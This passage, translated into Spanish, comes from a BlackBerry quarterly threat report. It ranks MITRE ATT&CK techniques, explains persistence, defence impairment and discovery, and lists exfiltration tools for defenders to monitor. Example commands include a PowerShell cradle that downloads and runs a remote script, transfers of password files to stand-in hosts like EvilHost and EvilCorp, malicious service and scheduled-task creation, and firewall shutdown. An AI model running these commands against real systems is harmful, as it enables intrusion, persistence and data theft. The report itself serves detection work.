8
|
↓
|
|
Descubrimiento de archivos y directorios
|
T1083
|
Descubrimiento
|
7
|
↓
|
|
Enmascaramiento
|
T1036
|
Defensa Evasión
|
6
|
↓
|
|
Protocolo de la capa de aplicación
|
T1071
|
Mando y control
|
9
|
↓
|
|
Protocolo de capa no aplicativa
|
T1095
|
Mando y control
|
11
|
↓
|
|
Descubrimiento remoto del sistema
|
T1018
|
Descubrimiento
|
12
|
↓
|
|
Ejecución de arranque o inicio automático de sesión
|
T1547
|
Persistencia, escalada de privilegios
|
NA
|
↑
|
|
Claves de ejecución del registro / Carpeta de inicio
|
T1547.001
|
Persistencia, escalada de privilegios
|
10
|
↓
|
|
Descubrimiento de ventanas de aplicación
|
T1010
|
Descubrimiento
|
13
|
↓
|
|
Deteriorar las defensas
|
T1562
|
Defensa Evasión
|
NA
|
↑
|
|
Desactivar o modificar herramientas
|
T1562.001
|
Defensa Evasión
|
17
|
↓
|
|
Tarea/trabajo programado
|
T1053
|
Ejecución, persistencia, escalada de privilegios
|
15
|
↓
|
|
Datos del sistema local
|
T1005
|
Colección
|
NA
|
↑
|
| Técnica ID | |
|---|---|
| Flujo de ejecución del secuestro |
T1574
|
| Carga lateral de DLL |
T1574.002
|
| Inyección de procesos |
T1055
|
| Captura de entrada |
T1056
|
| Descubrimiento de información del sistema |
T1082
|
| Descubrimiento de software |
T1518
|
| Descubrimiento de software de seguridad |
T1518.001
|
| Descubrimiento de procesos |
T1057
|
| Descubrimiento de archivos y directorios |
T1083
|
| Enmascaramiento |
T1036
|
| Protocolo de la capa de aplicación |
T1071
|
| Protocolo de capa no aplicativa |
T1095
|
| Descubrimiento remoto del sistema |
T1018
|
| Ejecución de arranque o inicio automático de sesión |
T1547
|
| Claves de ejecución del registro / Carpeta de inicio |
T1547.001
|
| Descubrimiento de ventanas de aplicación |
T1010
|
| Deteriorar las defensas |
T1562
|
| Desactivar o modificar herramientas |
T1562.001
|
| Tarea/trabajo programado |
T1053
|
| Datos del sistema local |
T1005
|
| Nombre de la táctica | |
|---|---|
| Flujo de ejecución del secuestro |
Persistencia, escalada de privilegios, evasión de defensas
|
| Carga lateral de DLL |
Persistencia, escalada de privilegios, evasión de defensas
|
| Inyección de procesos |
Escalada de privilegios, evasión de defensas
|
| Captura de entrada |
Acceso a credenciales, recogida
|
| Descubrimiento de información del sistema |
Descubrimiento
|
| Descubrimiento de software |
Descubrimiento
|
| Descubrimiento de software de seguridad |
Descubrimiento
|
| Descubrimiento de procesos |
Descubrimiento
|
| Descubrimiento de archivos y directorios |
Descubrimiento
|
| Enmascaramiento |
Defensa Evasión
|
| Protocolo de la capa de aplicación |
Mando y control
|
| Protocolo de capa no aplicativa |
Mando y control
|
| Descubrimiento remoto del sistema |
Descubrimiento
|
| Ejecución de arranque o inicio automático de sesión |
Persistencia, escalada de privilegios
|
| Claves de ejecución del registro / Carpeta de inicio |
Persistencia, escalada de privilegios
|
| Descubrimiento de ventanas de aplicación |
Descubrimiento
|
| Deteriorar las defensas |
Defensa Evasión
|
| Desactivar o modificar herramientas |
Defensa Evasión
|
| Tarea/trabajo programado |
Ejecución, persistencia, escalada de privilegios
|
| Datos del sistema local |
Colección
|
| Último informe | |
|---|---|
| Flujo de ejecución del secuestro |
NA
|
| Carga lateral de DLL |
3
|
| Inyección de procesos |
1
|
| Captura de entrada |
4
|
| Descubrimiento de información del sistema |
2
|
| Descubrimiento de software |
NA
|
| Descubrimiento de software de seguridad |
5
|
| Descubrimiento de procesos |
8
|
| Descubrimiento de archivos y directorios |
7
|
| Enmascaramiento |
6
|
| Protocolo de la capa de aplicación |
9
|
| Protocolo de capa no aplicativa |
11
|
| Descubrimiento remoto del sistema |
12
|
| Ejecución de arranque o inicio automático de sesión |
NA
|
| Claves de ejecución del registro / Carpeta de inicio |
10
|
| Descubrimiento de ventanas de aplicación |
13
|
| Deteriorar las defensas |
NA
|
| Desactivar o modificar herramientas |
17
|
| Tarea/trabajo programado |
15
|
| Datos del sistema local |
NA
|
| Cambia | |
|---|---|
| Flujo de ejecución del secuestro |
↑
|
| Carga lateral de DLL |
↑
|
| Inyección de procesos |
↓
|
| Captura de entrada |
=
|
| Descubrimiento de información del sistema |
↓
|
| Descubrimiento de software |
↑
|
| Descubrimiento de software de seguridad |
↓
|
| Descubrimiento de procesos |
↓
|
| Descubrimiento de archivos y directorios |
↓
|
| Enmascaramiento |
↓
|
| Protocolo de la capa de aplicación |
↓
|
| Protocolo de capa no aplicativa |
↓
|
| Descubrimiento remoto del sistema |
↓
|
| Ejecución de arranque o inicio automático de sesión |
↑
|
| Claves de ejecución del registro / Carpeta de inicio |
↓
|
| Descubrimiento de ventanas de aplicación |
↓
|
| Deteriorar las defensas |
↑
|
| Desactivar o modificar herramientas |
↓
|
| Tarea/trabajo programado |
↓
|
| Datos del sistema local |
↑
|
Utilizando MITRE D3FEND™, el equipo de Investigación e Inteligencia de Amenazas de BlackBerry ha desarrollado una lista completa de contramedidas para las técnicas observadas durante el periodo de este informe, que está disponible en nuestro GitHub público. Los adversarios utilizan las tres técnicas más conocidas para recopilar información clave para llevar a cabo ataques con éxito. En la sección Contramedidas aplicadas, analizamos algunos ejemplos de su uso e información útil para monitorizar. La clasificación del impacto del total de técnicas y tácticas puede verse en esta figura.
Tácticas detectadas
En este periodo de referencia, hay dos tácticas con el mismo porcentaje de observaciones, la Escalada de privilegios y la Evasión de la defensa, con un 23%, seguidas del Descubrimiento, con un 19%. Se trata de las mismas tácticas principales del periodo anterior.
-
Contramedidas aplicadas
El Equipo de Investigación e Inteligencia de BlackBerry analizó cinco de las Técnicas MITRE más observadas:
-
Flujo de Ejecución del Secuestro - T1574
Hijack Execution Flow (T1574) es una sofisticada técnica empleada por los adversarios para interceptar y manipular el flujo de ejecución normal de un sistema, permitiéndoles ejecutar código malicioso en su lugar. Este método resultó ser muy frecuente en el último trimestre, lo que demuestra su popularidad debido a su eficacia para lograr la persistencia y ejecutar acciones no autorizadas.
Existen múltiples vías para aprovechar los métodos de esta técnica, como el secuestro del orden de búsqueda de DLL, la carga lateral de DLL y la inyección de código malicioso en procesos legítimos. Al secuestrar el flujo de ejecución, los atacantes pueden hacerse con el control del sistema sin activar las alertas de seguridad estándar. Esto dificulta que las herramientas de seguridad detecten e impidan futuras actividades del actor de la amenaza. Por ejemplo, colocando una DLL maliciosa en una ubicación que se busque antes que la legítima, el atacante puede asegurarse de que su código se ejecute cuando una aplicación legítima cargue la DLL.
Una ventaja significativa de esta técnica para los adversarios es su capacidad para eludir las medidas de seguridad. Dado que el código malicioso se ejecuta en el contexto de un proceso de confianza, puede eludir los mecanismos de seguridad tradicionales que se basan en el análisis del comportamiento de los procesos. Esta capacidad hace que Hijack Execution Flow sea particularmente peligroso, ya que puede utilizarse para realizar una amplia gama de actividades maliciosas, desde la escalada de privilegios hasta la exfiltración de datos.
Para defenderse de T1574, las organizaciones deben aplicar medidas de seguridad integrales, incluidas listas blancas de aplicaciones, gestión rigurosa de parches y supervisión continua de las actividades del sistema y la red. La actualización periódica del software y la garantía de que solo puedan ejecutarse las aplicaciones autorizadas reducen significativamente el riesgo de secuestro del flujo de ejecución.
La formación para concienciar a los usuarios también desempeña un papel fundamental a la hora de ayudar a los empleados a reconocer las señales de posibles intentos de secuestro del flujo de ejecución, lo que contribuye a reforzar la postura de seguridad. Por último, el empleo de soluciones avanzadas de detección de amenazas que puedan identificar patrones de comportamiento anómalos asociados a esta técnica es crucial para una detección y respuesta oportunas. Algunos ejemplos del uso de T1574 incluyen:
- Secuestro del orden de búsqueda de DLL: Un ejemplo común es la explotación del orden de búsqueda de DLL en Windows. Si un atacante coloca un msvcrt.dll malicioso en el directorio de trabajo de la aplicación, esta puede cargarlo en lugar de la versión legítima del directorio del sistema.
- Carga lateral de DLL: En 2018, el grupo APT OceanLotus utilizó la carga lateral de DLL con el ejecutable legítimo de Microsoft Word para cargar una DLL maliciosa que estableció persistencia y ejecutó más cargas útiles.
- Secuestro COM: Un atacante registra un objeto COM malicioso en una clave de registro específica que una aplicación legítima consulta con frecuencia. Cuando la aplicación llama al objeto COM, se ejecuta el código malicioso en lugar del objeto COM previsto.
- Windows AppInit_DLLs: Al modificar las claves de registro como AppInit_DLLs, un atacante se asegura de que su DLL maliciosa se carga en todos los procesos aplicables, lo que le otorga el control sobre estos procesos.
- Inyección en procesos legítimos: Un caso conocido es esta técnica implica el uso de inyección DLL reflexiva por la herramienta Cobalt Strike, donde la carga útil se inyecta en un proceso legítimo para evadir la detección por parte del software de seguridad.
-
Ejecución de arranque o inicio automático de sesión - T1547
En la técnica de ejecución automática de arranque o inicio de sesión (T1547), un atacante primero se asegura de que el malware se ejecute automáticamente durante el arranque del sistema o el inicio de sesión del usuario. A continuación, el atacante utiliza mecanismos como claves de registro, carpetas de inicio, tareas programadas o registros de servicios para mantener la persistencia o para obtener privilegios elevados en el sistema comprometido. Estos mecanismos están diseñados para facilitar la funcionalidad legítima del software y las tareas de gestión del sistema en el sistema operativo. Sin embargo, los adversarios pueden abusar de estas funciones para incrustar su código malicioso, ayudándole así a mezclarse con las operaciones normales del sistema. Entender y asegurar estos mecanismos críticos del sistema operativo es esencial para protegerse contra la persistencia no autorizada y la escalada de privilegios.
He aquí un ejemplo de una ubicación de clave de registro utilizada frecuentemente para establecer la persistencia:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run ' - Este es el registro de Windows utilizado para configurar los programas que se ejecutan automáticamente cuando se inicia el sistema operativo.
Un ejemplo de carpeta de inicio utilizada para establecer la persistencia es:
'%APPDATA%%\Microsoft\Windows\Start Menu\Programs\Startup ' - Esta ruta conduce a la carpeta de inicio, donde se colocan los accesos directos a los programas que deben iniciarse automáticamente cuando el usuario inicia sesión.
A continuación se muestra un ejemplo de cómo se puede aprovechar la creación de servicios para la persistencia:
sc create Updater binPath= "C:\Windows\malicious[.]exe" start= auto ' - El comando utiliza la utilidad de servicio para crear un servicio llamado "Updater" que está configurado para iniciarse automáticamente al arrancar el sistema.
Otro ejemplo de establecer persistencia y obtener privilegios elevados es a través del Programador de Tareas de Windows:
schtasks /create /tn "Updater" /tr "C:\Windows\malicious[.]exe" /sc onlogon /ru SYSTEM ' - El comando crea una tarea programada llamada "Updater" que ejecuta el ejecutable malicious.exe en la ubicación especificada cada vez que un usuario inicia sesión, con la tarea específica ejecutándose bajo la cuenta SYSTEM para privilegios elevados.
-
Deterioro de las defensas - T1562
La técnica de MITRE Impair Defenses (T1562), dentro de la táctica Defense Evasion (TA0005), fue reconocida como una de las cinco técnicas más utilizadas por los adversarios durante el periodo del informe. Esta técnica altera elementos del entorno de la víctima para obstaculizar o inutilizar los mecanismos defensivos. Los agresores no sólo dañan las defensas preventivas como cortafuegos y software antivirus (AV), sino que también interrumpen las capacidades de detección que los defensores utilizan para auditar la actividad e identificar comportamientos maliciosos.
Cuando los actores de amenazas consiguen dañar las defensas de una víctima, obtienen libertad para atacar sin ser detectados. Esto les permite inyectar binarios maliciosos, que pueden utilizarse para explotar otras técnicas de MITRE, como keyloggers, gusanos, troyanos y shells web maliciosos. Todos ellos pueden llevar a la ejecución de ransomware en una máquina.
Es crucial emplear medidas de protección contra la técnica T1562 de MITRE para salvaguardar su sistema de este tipo de ataques. Esta técnica suele utilizarse al principio de un ataque, por lo que es esencial detectarla y contrarrestarla lo antes posible.
A continuación se muestra una lista de líneas de comandos que son útiles para supervisar:
- sc stop <ServiceName>
- sc config <ServiceName> start=disabled
- net stop <ServiceName>
- taskkill /IM <ToolName> /F
- netsh advfirewall set allprofiles state off
- bcdedit.exe /deletevalue {por defecto} safeboot
- bcdedit /set {default} recoveryenabled no
-
Descubrimiento de la ventana de aplicación - T1010
La técnica Application Window Discovery (T1010), dentro de la táctica Discovery (TA0007), fue identificada por los especialistas de BlackBerry como una de las principales técnicas utilizadas por los actores de ciberamenazas en este periodo. Esta técnica consiste en hacer una lista de las aplicaciones de Windows abiertas, lo que proporciona a los ciberdelincuentes información útil sobre los patrones de uso del sistema objetivo. Esta información puede ser muy valiosa para identificar datos específicos que vale la pena recopilar, así como el software de seguridad que los atacantes deben evadir para evitar ser detectados. Los actores de amenazas utilizan esta técnica para comprender mejor el entorno y planificar su ataque de la forma más agresiva posible sin ser detectados.
Para obtener primero la lista de aplicaciones de Windows abiertas, los atacantes suelen explotar funciones integradas en el sistema. Por ejemplo, pueden utilizar comandos del intérprete de comandos y scripts o funciones de la API nativa para recopilar la información necesaria. Estas herramientas y funciones nativas se utilizan a menudo porque es menos probable que causen sospechas y pueden ofrecer información completa sobre el sistema.
Dado que estos comportamientos son sospechosos y pueden proporcionar a un adversario información significativa sobre el sistema de la víctima, es importante disponer de una configuración de software de seguridad capaz de detectar estos comandos o acciones ejecutadas por los adversarios.
A continuación se muestra una lista de líneas de comandos que puede ser útil supervisar:
- gps | where {$_.mainwindowtitle}
- Get-Process | Where-Object MainWindowTitle
- "cscript.exe", "rundll32.exe", "explorer.exe", "wscript.exe", "PowerShell.exe", "pwsh.dll", "winlogon.exe", "cmd.exe" siendo el proceso padre para el uso de estas APIs: "user32.dll!GetWindowTextA", "user32.dll!GetForegroundWindow", "user32.dll!GetActiveWindow", "user32.dll!GetWindowTextW"
- lista de tareas & lista de tareas /v
-
Descubrimiento de software - T1518
El marco ATT&CK de MITRE identifica el descubrimiento de software (T1518) como una técnica clave dentro de la táctica de descubrimiento (TA0007). Este método es utilizado con frecuencia por los adversarios para obtener información sobre el entorno de software de los sistemas objetivo, por lo que es un paso crítico en muchos ciberataques. El descubrimiento de software permite a los atacantes identificar vulnerabilidades determinando qué aplicaciones y versiones están instaladas en un sistema. Esta información ayuda a los adversarios a explotar software obsoleto o sin parches, planificar formas de desactivar o eludir las medidas de seguridad y adaptar sus ataques para lograr la máxima eficacia.
Los métodos más comunes para descubrir software incluyen el uso de Windows Management Instrumentation (WMI) con comandos como wmic "product" get name, version, vendor y scripts PowerShell como Get-ItemProperty o Get-WmiObject. Estos métodos permiten a los atacantes recuperar información detallada sobre el software, consultar el registro de Windows e identificar los procesos en ejecución y las aplicaciones asociadas. Las implicaciones de un descubrimiento de software exitoso son significativas. Los atacantes pueden explotar las vulnerabilidades de software identificadas para escalar privilegios o ejecutar código arbitrario. También pueden desactivar o eludir las defensas de seguridad, aumentando la probabilidad de operar sin ser detectados. Además, al comprender el entorno de software, los adversarios pueden desplegar malware dirigido específicamente a las aplicaciones descubiertas, aumentando la eficacia y el sigilo de sus ataques.
Para protegerse contra esta técnica, las organizaciones deben implantar mecanismos sólidos de supervisión y alerta. Es esencial supervisar el uso de comandos y secuencias de comandos comúnmente asociados con el descubrimiento de software. El empleo de sistemas avanzados de detección de amenazas que utilicen análisis de comportamiento puede ayudar a detectar actividades inusuales. Garantizar que todo el software esté actualizado y parcheado, limitar el uso de herramientas administrativas al personal autorizado y mantener registros exhaustivos de la ejecución de comandos también son pasos cruciales.
CylanceMDR Datos
Esta sección del informe destaca las principales detecciones de amenazas interesantes observadas en CylanceMDR entornos de clientes que fueron objetivo de una amenaza durante este periodo.
CylanceMDR es un servicio de detección y respuesta gestionadas (MDR) basado en suscripción que proporciona supervisión 24x7. Ayuda a las organizaciones a detener ciberamenazas sofisticadas que buscan lagunas en los programas de seguridad del cliente. El equipo de MDR de BlackBerry rastreó miles de alertas durante este periodo. A continuación, desglosamos la telemetría región por región para proporcionar información adicional sobre el panorama actual de las amenazas.
CylanceMDR Observaciones
Durante el periodo de este informe, de forma similar al último informe, el equipo de CylanceMDR observó que Certutil seguía siendo una importante fuente de detección para el centro de operaciones de seguridad (SOC) en todas las regiones.
En las regiones de Norteamérica/América Latina (NALA) y EMEA, también observamos una tendencia de actividad relacionada con las detecciones de "descargas de PowerShell". Por ejemplo, vimos adversarios que intentaban lograr la técnica de MITRE Ingress Tool Transfer (T1105) mediante el uso de cunas de descarga a través de PowerShell como powershell.exe -noexit -ep bypass -command IEX((New-Object System.Net.WebClient).DownloadString('hxxps://SourceofEvil/test[.]ps1')).
Además, hemos observado un aumento de las detecciones codificadas en Base64, que no eran tan frecuentes en los resultados de nuestro informe anterior. La codificación Base64 ofrece una forma relativamente sencilla de ofuscar el código, lo que permite disfrazar el código malicioso y hacerlo potencialmente menos detectable. Sin embargo, la mayoría de los analistas experimentados son muy conscientes del uso de Base64 por parte de los actores de amenazas, por lo que los SOC más maduros suelen incorporar capacidades adicionales de vigilancia y detección para identificar esta técnica de evasión.
De particular interés en la región NALA y APAC, hemos empezado a observar algunas detecciones más relacionadas con el "Posible abuso de Msiexec a través de la carga de DLL" en este periodo del informe. Msiexec es una utilidad de línea de comandos de Windows que suele asociarse a la ejecución de paquetes de instalación .msi. Nuestro sistema detecta amenazas que intentan abusar de Msiexec para ejecutar por proxy una carga maliciosa DLL (técnica T1218.007 de MITRE). Un ejemplo de comando visto es: 'C:\windows\system32\msiexec.exe /Z c:\programdata\evil.dll'.
Actividad de LOLBAS
Durante este periodo de notificación, observamos la siguiente actividad de binarios, scripts y bibliotecas que viven fuera del territorio (LOLBAS):
- Bitsadmin sigue siendo el LOLBAS más observado.
- Certutil le sigue de cerca y ha aumentado desde el último informe.
- Regsvr32, MSHTA y MOFCOMP se siguen observando, pero en general representan un porcentaje bajo.
Herramientas de exfiltración
En nuestro informe anterior, hablábamos de las herramientas de supervisión y gestión remotas (RMM) y de cómo los actores de amenazas abusan a menudo de ellas. Las herramientas RMM ofrecen a los agresores una forma sencilla de mantener la persistencia y la facilidad de acceso, así como de filtrar fácilmente los datos de los entornos de los clientes. De hecho, los investigadores han informado de que las herramientas RMM son la categoría de más rápido crecimiento para que los grupos de ransomware exfiltren de los entornos de las víctimas.
Siguiendo con el tema de la exfiltración, durante este periodo de informes, CylanceMDR revisó las herramientas más frecuentes que podrían utilizarse para la exfiltración (sin incluir las herramientas RMM) en los entornos de nuestros clientes.
Herramientas
WinSCP
Descripción: WinSCP es un cliente de transferencia de archivos; PuTTY es un cliente de shell seguro (SSH).
Ejemplo de línea de comandos: winscp.exe scp://test: P@ss123[at]EvilHost[.]com:2222/ /cargar contraseñas.txt /defaults=auto
Nota: Se suele utilizar con una interfaz gráfica de usuario (GUI).
INGLETE ATT&CK ID: T1048
Rclone
Descripción: Rclone es una utilidad de línea de comandos que se utiliza para gestionar el contenido en el almacenamiento en la nube (es decir, lo que permite la transferencia de archivos en la nube)
Ejemplo de línea de comandos: rclone.exe copy "\\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10
INGLETE ATT&CK ID: S1040
FileZilla
Descripción: FileZilla es una conocida herramienta de protocolo de transferencia de archivos (FTP) que puede utilizarse en varios sistemas operativos.
Ejemplo de línea de comandos: filezilla.exe -u "ftp://test:p@ss1234[at]ftp.test[.]com" -e "put passwords.txt /directorio_remoto/pass.txt"
INGLETE ATT&CK ID: T1071.002
PSCP
Descripción: PuTTY Secure Copy Protocol (PSCP) es una utilidad de línea de comandos utilizada para transferir archivos y carpetas.
Ejemplo de línea de comandos: pscp.exe -P 22 C:\Finanzas.txt root[at]EvilDomain/tmp
INGLETE ATT&CK ID: T1021.004
FreeFileSync
Descripción: FreeFileSync es una herramienta de sincronización que se puede utilizar para gestionar copias de seguridad.
Ejemplo de línea de comandos: FreeFileSync.exe google_drive_sync.ffs_batch
Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />
INGLETE ATT&CK ID: T1567.002
Principales conclusiones
La lista de herramientas anterior no es exhaustiva, ya que existen muchas variaciones de herramientas utilizadas con fines de exfiltración. Por lo tanto, es importante que las organizaciones cuenten con una estrategia de defensa contra el uso de herramientas que puedan utilizarse con fines maliciosos.
Estas estrategias pueden incluir:
- Herramientas de prevención de pérdida de datos (DLP) para detectar y prevenir la pérdida, el uso indebido o el intercambio de datos confidenciales a través de una brecha, y el uso no autorizado o la exfiltración.
- Cifrado en reposo y en tránsito.
- Controles de acceso.
- Configuración de "mínimo privilegio". Proporcione acceso sólo a lo que sea necesario.
- Auditar periódicamente las cuentas: por ejemplo, si un usuario cambia de función, puede tener acceso a datos que ya no necesita.
- Segmentación de la red, ya que en una brecha, los segmentos de red bien definidos impedirán el movimiento lateral y reducirán la superficie de ataque.
- Sistemas de detección de intrusos para supervisar el tráfico de la red.
- Aplicar un enfoque de denegación por defecto: habilitar sólo cuando sea necesario. Por ejemplo:
- Bloquear el uso de puertos USB o servicios de almacenamiento en la nube. (Por ejemplo, utilizando objetos de directiva de grupo (GPO) para desactivar la transferencia de datos en puertos USB).
- Los puertos no deben estar expuestos públicamente a Internet (es decir, el puerto 22 (SSH) no debe estar abierto de salida a Internet).
- Reduzca el riesgo global limitando el uso de puertos, protocolos y servicios.
- Monitorización de patrones de tráfico saliente, tales como:
- Aumento del tráfico fuera de las horas normales de funcionamiento (desviación de la línea de base normal).
- Un aumento repentino del tráfico saliente a través del puerto 22 podría indicar una exfiltración mediante una herramienta como pscp.exe.
- Como ya se ha indicado, los puertos como el 22 deben aplicar un enfoque de denegación por defecto para evitar estos riesgos.
- Colocación de controles para vigilar los intentos de salida en puertos o servicios que han sido desactivados.
- Por ejemplo, si un agente de amenazas consigue acceder a una red e intenta habilitar estos puertos o servicios para su uso, estos controles alertarán al equipo de seguridad.
Desde la perspectiva de un analista SOC, he aquí algunos ejemplos de lo que los analistas deben tener en cuenta:
Cambio de nombre de las herramientas
Los analistas deben conocer las herramientas de exfiltración más utilizadas, así como sus opciones y parámetros. Utilizando el ejemplo de Rclone - 'rclone.exe copy " \SERVER\passwords\ ftp:EvilCorp\files " -q --transfers 10 '- un actor de amenazas puede cambiar el nombre a algo más inocuo como - 'svchost.exe copy "\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10'.
Volumen de transferencia de datos
Si se produce una gran transferencia de datos o un aumento repentino del tráfico saliente, los analistas deben investigar, sobre todo si la transferencia se produce fuera del horario laboral.
Tráfico anómalo
Desconfíe de un patrón inesperado de transferencias de datos desde IP o hosts desconocidos.
Análisis del comportamiento de los usuarios
Esté atento a los patrones que se desvían de la norma, como un usuario que accede a archivos a los que normalmente no tendría necesidad de acceder. Un ejemplo sería el acceso de un miembro del equipo de marketing a los registros financieros de un cliente.
Conclusión y previsiones
Este informe de 90 días, que abarca de abril a junio de 2024, está diseñado para ayudarle a mantenerse informado y preparado ante futuras amenazas. Los grupos delictivos de alto perfil, especialmente los operadores de ransomware, están explotando nuevas vulnerabilidades y encontrando valor en objetivos grandes y pequeños. Como señala el informe, los investigadores de BlackBerry observaron una media de más de 11.500 hashes de malware únicos capturados diariamente. Este nivel de actividad hace que sea crucial mantenerse al día de las últimas noticias de seguridad para su sector y región.
Dada la situación actual de las ciberamenazas, prevemos las siguientes amenazas en los próximos meses:
Interferencias electorales
A nivel mundial, 2024 es un año importante para las elecciones, ya que se espera que vote alrededor del 60% de la población mundial. A lo largo del año ya se han observado intentos de desinformación, desinformación e interferencia, incluidas amenazas a través del medio relativamente nuevo de los deepfakes. Los actores maliciosos intentan cada vez más aprovechar el momento para sembrar la confusión, fomentar las divisiones sociales y causar trastornos. Prevemos que intensificarán sus campañas de difusión de noticias falsas y desinformación, intensificando sus esfuerzos a medida que se acerquen las elecciones.
Señuelos de phishing con carga política
El abuso de mensajes, foros y listas de correo con carga política para propagar malware podría convertirse pronto en una táctica armamentística. Aprovechando las opiniones polarizadas de diversos círculos políticos, los actores de amenazas podrían explotar este caos para distribuir material político infectado con troyanos, desplegando aún más malware. Entre las tácticas habituales se incluye la creación de publicaciones en redes sociales que siembren la desinformación y generen millones de clics, visualizaciones e interacciones en plataformas de redes sociales, mensajería instantánea y medios de noticias tradicionales. Muchos actores de amenazas pueden utilizar estas actividades en las redes sociales como señuelo para llevar a cabo ataques de malware.
La militarización del caos
En el ámbito de la ciberseguridad, cualquier tipo de caos sirve como terreno fértil para que los actores maliciosos exploten la confusión y la desinformación. Ya sea durante guerras, catástrofes naturales, cortes informáticos o cualquier interrupción significativa del flujo normal de comunicaciones y datos, los periodos de inestabilidad ofrecen amplias oportunidades a los ciberdelincuentes. Los actores de amenazas están preparados para aprovechar continuamente estas situaciones mediante la difusión de falsos correos electrónicos de phishing, mensajes engañosos en foros y software malicioso que se hace pasar por herramientas útiles y contextualmente relevantes.
Evolución del ransomware y la IA
Ante el creciente escrutinio por parte de las fuerzas del orden, los legisladores y los profesionales de la seguridad de todo el mundo, es probable que los autores de amenazas de ransomware evolucionen sus tácticas, técnicas y procedimientos (TTP) para continuar sus operaciones.
Esta evolución puede implicar el aprovechamiento de la IA (en particular la IA generativa) para desarrollar cargas útiles y cadenas de ejecución más sofisticadas y blindadas, la utilización de la tecnología deepfake para ataques avanzados y selectivos de ingeniería social, la descentralización y el anonimato de la infraestructura de red y C2 para eludir el rastreo y el cierre, y la mejora de la seguridad operativa.
Visite el blogBlackBerry para mantenerse al día sobre el cambiante panorama de las amenazas y defensas de la ciberseguridad.
Agradecimientos
Este informe representa los esfuerzos de colaboración de nuestros talentosos equipos e individuos. En particular, nos gustaría expresar nuestro reconocimiento:
- Adrian Chambers
- Alan McCarthy
- Alexandra Mozil
- Amalkanth Raveendran
- Anne-Carmen Ditter
- Daniel Corry
- Decano Given
- Geoff O'Rourke
- John de Boer
- Ismael Valenzuela Espejo
- Maristela Ames
- Natalia Ciapponi
- Natasha Rohner
- Ronald Welch
- Samual Ríos
- Travis Hoxmeier
- William Johnson
También queremos dar las gracias al Centro Nacional de Coordinación de la Ciberdelincuencia de la Real Policía Montada de Canadá por su contribución y colaboración.
Manténgase al tanto de las ciberamenazas
Regístrese ahora